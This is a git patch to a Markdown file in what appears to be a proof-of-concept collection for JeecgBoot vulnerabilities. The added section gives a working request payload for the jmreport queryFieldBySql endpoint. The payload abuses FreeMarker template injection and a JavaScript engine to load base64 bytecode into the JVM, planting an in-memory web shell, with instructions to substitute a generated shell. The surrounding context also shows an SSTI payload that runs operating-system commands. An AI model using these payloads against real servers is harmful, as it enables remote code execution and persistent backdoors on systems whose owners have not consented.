From f8dd5d2ca6ef122daba67c985cfaa916abcbcfe6 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 29 Jun 2024 01:29:47 +0800
Subject: [PATCH] =?UTF-8?q?Update=20JeecgBoot=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 "JeecgBoot\346\274\217\346\264\236.md" | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git "a/JeecgBoot\346\274\217\346\264\236.md" "b/JeecgBoot\346\274\217\346\264\236.md"
index 29214f72..3de9765f 100644
--- "a/JeecgBoot\346\274\217\346\264\236.md"
+++ "b/JeecgBoot\346\274\217\346\264\236.md"
@@ -13,6 +13,19 @@ Content-Length: 123
 
 {"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"open -a calculator.app  \") }' "}
 ```
+## queryFieldBySql 注入内存马
+```
+{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}
+```
+使用内存马工具生成payload，将生成的base64格式的内存马 替换payload 中bytecodeBase64的值
+
+![image](https://github.com/wy876/POC/assets/139549762/55a9877c-c111-4897-a665-8f58e9de5300)
+
+![image](https://github.com/wy876/POC/assets/139549762/03a476fa-7d2a-4221-9c96-c5b60040adfd)
+
+![image](https://github.com/wy876/POC/assets/139549762/24b6b0b2-419c-43d1-a0c8-8ced440e0a79)
+
+内存马路径：`http://192.168.18.131:8080/jeecg-boot/jmreport/queryFieldBySql/`
 
 ## JeecgBoot SSTI 漏洞
 ```